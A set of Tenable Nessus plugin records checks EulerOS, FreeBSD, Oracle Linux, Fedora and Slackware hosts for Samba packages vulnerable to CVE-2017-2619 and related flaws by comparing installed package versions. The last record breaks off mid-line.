description	According to the versions of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) - A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) - A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-05-06
modified	2017-06-09
plugin id	100697
published	2017-06-09
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100697
title	EulerOS 2.0 SP1 : samba (EulerOS-SA-2017-1104)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(100697); script_version("3.15"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04"); script_cve_id( "CVE-2016-2125", "CVE-2016-2126", "CVE-2017-2619", "CVE-2017-7494" ); script_name(english:"EulerOS 2.0 SP1 : samba (EulerOS-SA-2017-1104)"); script_summary(english:"Checks the rpm output for the updated packages."); script_set_attribute(attribute:"synopsis", value: "The remote EulerOS host is missing multiple security updates."); script_set_attribute(attribute:"description", value: "According to the versions of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) - A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) - A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) - A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."); # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1104 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4fe4f154"); script_set_attribute(attribute:"solution", value: "Update the affected samba packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Samba is_known_pipename() Arbitrary Module Load'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/26"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/06/09"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:libsmbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:libwbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-client-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-common-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-common-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-python"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-winbind"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-winbind-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:samba-winbind-modules"); script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Huawei Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp"); script_exclude_keys("Host/EulerOS/uvp_version"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/EulerOS/release"); if (isnull(release) \|\| release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS"); if (release !~ "^EulerOS release 2\.0(\D\|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0"); sp = get_kb_item("Host/EulerOS/sp"); if (isnull(sp) \|\| sp !~ "^(1)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1"); uvp = get_kb_item("Host/EulerOS/uvp_version"); if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1", "EulerOS UVP " + uvp); if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu); flag = 0; pkgs = ["libsmbclient-4.2.10-7.h4", "libwbclient-4.2.10-7.h4", "samba-4.2.10-7.h4", "samba-client-4.2.10-7.h4", "samba-client-libs-4.2.10-7.h4", "samba-common-4.2.10-7.h4", "samba-common-libs-4.2.10-7.h4", "samba-common-tools-4.2.10-7.h4", "samba-libs-4.2.10-7.h4", "samba-python-4.2.10-7.h4", "samba-winbind-4.2.10-7.h4", "samba-winbind-clients-4.2.10-7.h4", "samba-winbind-modules-4.2.10-7.h4"]; foreach (pkg in pkgs) if (rpm_check(release:"EulerOS-2.0", sp:"1", reference:pkg)) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "samba"); }

NASL family	FreeBSD Local Security Checks
NASL id	FREEBSD_PKG_2826317B10EC11E7944E000C292E4FD8.NASL
description	Samba team reports : A time-of-check, time-of-use race condition can allow clients to access non-exported parts of the file system via symlinks.
last seen	2020-06-01
modified	2020-06-02
plugin id	97972
published	2017-03-27
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97972
title	FreeBSD : samba -- symlink race allows access outside share definition (2826317b-10ec-11e7-944e-000c292e4fd8)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from the FreeBSD VuXML database : # # Copyright 2003-2018 Jacques Vidrine and contributors # # Redistribution and use in source (VuXML) and 'compiled' forms (SGML, # HTML, PDF, PostScript, RTF and so forth) with or without modification, # are permitted provided that the following conditions are met: # 1. Redistributions of source code (VuXML) must retain the above # copyright notice, this list of conditions and the following # disclaimer as the first lines of this file unmodified. # 2. Redistributions in compiled form (transformed to other DTDs, # published online in any format, converted to PDF, PostScript, # RTF and other formats) must reproduce the above copyright # notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # include("compat.inc"); if (description) { script_id(97972); script_version("3.8"); script_cvs_date("Date: 2019/04/10 16:10:17"); script_cve_id("CVE-2017-2619"); script_name(english:"FreeBSD : samba -- symlink race allows access outside share definition (2826317b-10ec-11e7-944e-000c292e4fd8)"); script_summary(english:"Checks for updated packages in pkg_info output"); script_set_attribute( attribute:"synopsis", value: "The remote FreeBSD host is missing one or more security-related updates." ); script_set_attribute( attribute:"description", value: "Samba team reports : A time-of-check, time-of-use race condition can allow clients to access non-exported parts of the file system via symlinks." ); script_set_attribute( attribute:"see_also", value:"https://www.samba.org/samba/security/CVE-2017-2619.html" ); # https://vuxml.freebsd.org/freebsd/2826317b-10ec-11e7-944e-000c292e4fd8.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?b0eb7bc8" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba36"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba4"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba41"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba42"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba43"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba44"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba45"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:samba46"); script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/23"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FreeBSD Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info"); exit(0); } include("audit.inc"); include("freebsd_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD"); if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (pkg_test(save_report:TRUE, pkg:"samba36>=3.6.0<=3.6.25_4")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba4>=4.0.0<=4.0.26")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba41>=4.1.0<=4.1.23")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba42>=4.2.0<=4.2.14")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba43>=4.3.0<=4.3.13")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba44>=4.4.0<4.4.12")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba45>=4.5.0<4.5.7")) flag++; if (pkg_test(save_report:TRUE, pkg:"samba46>=4.6.0<4.6.1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2017-2789.NASL
description	From Red Hat Security Advisory 2017:2789 : An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce
last seen	2020-06-01
modified	2020-06-02
plugin id	103489
published	2017-09-27
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103489
title	Oracle Linux 6 : samba (ELSA-2017-2789)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2017:2789 and # Oracle Linux Security Advisory ELSA-2017-2789 respectively. # include("compat.inc"); if (description) { script_id(103489); script_version("3.8"); script_cvs_date("Date: 2019/09/27 13:00:38"); script_cve_id("CVE-2017-12150", "CVE-2017-12163", "CVE-2017-2619"); script_xref(name:"RHSA", value:"2017:2789"); script_name(english:"Oracle Linux 6 : samba (ELSA-2017-2789)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2017:2789 : An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce 'SMB signing' when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text. (CVE-2017-12150) * An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker. (CVE-2017-12163) Red Hat would like to thank the Samba project for reporting CVE-2017-2619 and CVE-2017-12150 and Yihan Lian and Zhibin Hu (Qihoo 360 GearTeam), Stefan Metzmacher (SerNet), and Jeremy Allison (Google) for reporting CVE-2017-12163. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619; and Stefan Metzmacher (SerNet) as the original reporter of CVE-2017-12150." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2017-September/007221.html" ); script_set_attribute( attribute:"solution", value:"Update the affected samba packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:libsmbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:libsmbclient-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-domainjoin-gui"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-glusterfs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-swat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-winbind"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-winbind-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-winbind-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/03/12"); script_set_attribute(attribute:"patch_publication_date", value:"2017/09/26"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/09/27"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| !pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); flag = 0; if (rpm_check(release:"EL6", reference:"libsmbclient-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"libsmbclient-devel-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-client-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-common-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-doc-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-domainjoin-gui-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", cpu:"x86_64", reference:"samba-glusterfs-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-swat-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-winbind-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-winbind-clients-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-winbind-devel-3.6.23-45.0.1.el6_9")) flag++; if (rpm_check(release:"EL6", reference:"samba-winbind-krb5-locator-3.6.23-45.0.1.el6_9")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libsmbclient / libsmbclient-devel / samba / samba-client / etc"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-FB9ED95CF3.NASL
description	Security fix for CVE-2017-2619 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-07-17
plugin id	101752
published	2017-07-17
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/101752
title	Fedora 26 : 2:samba (2017-fb9ed95cf3)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2017-fb9ed95cf3. # include("compat.inc"); if (description) { script_id(101752); script_version("3.6"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-2619"); script_xref(name:"FEDORA", value:"2017-fb9ed95cf3"); script_name(english:"Fedora 26 : 2:samba (2017-fb9ed95cf3)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Security fix for CVE-2017-2619 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-fb9ed95cf3" ); script_set_attribute( attribute:"solution", value:"Update the affected 2:samba package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:2:samba"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:26"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/03/12"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/17"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^26([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 26", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC26", reference:"samba-4.6.2-0.fc26", epoch:"2")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "2:samba"); }

NASL family	Slackware Local Security Checks
NASL id	SLACKWARE_SSA_2017-082-02.NASL
description	New samba packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix a security issue.
last seen	2020-06-01
modified	2020-06-02
plugin id	97919
published	2017-03-24
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97919
title	Slackware 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-082-02)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Slackware Security Advisory 2017-082-02. The text # itself is copyright (C) Slackware Linux, Inc. # include("compat.inc"); if (description) { script_id(97919); script_version("3.5"); script_cvs_date("Date: 2019/04/10 16:10:18"); script_cve_id("CVE-2017-2619"); script_xref(name:"SSA", value:"2017-082-02"); script_name(english:"Slackware 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-082-02)"); script_summary(english:"Checks for updated package in /var/log/packages"); script_set_attribute( attribute:"synopsis", value:"The remote Slackware host is missing a security update." ); script_set_attribute( attribute:"description", value: "New samba packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix a security issue." ); # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435262 script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?137c8b24" ); script_set_attribute(attribute:"solution", value:"Update the affected samba package."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:slackware:slackware_linux:samba"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.0"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.1"); script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/24"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Slackware Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Slackware/release", "Host/Slackware/packages"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("slackware.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Slackware/release")) audit(AUDIT_OS_NOT, "Slackware"); if (!get_kb_item("Host/Slackware/packages")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Slackware", cpu); flag = 0; if (slackware_check(osver:"14.0", pkgname:"samba", pkgver:"4.4.12", pkgarch:"i486", pkgnum:"1_slack14.0")) flag++; if (slackware_check(osver:"14.0", arch:"x86_64", pkgname:"samba", pkgver:"4.4.12", pkgarch:"x86_64", pkgnum:"1_slack14.0")) flag++; if (slackware_check(osver:"14.1", pkgname:"samba", pkgver:"4.4.12", pkgarch:"i486", pkgnum:"1_slack14.1")) flag++; if 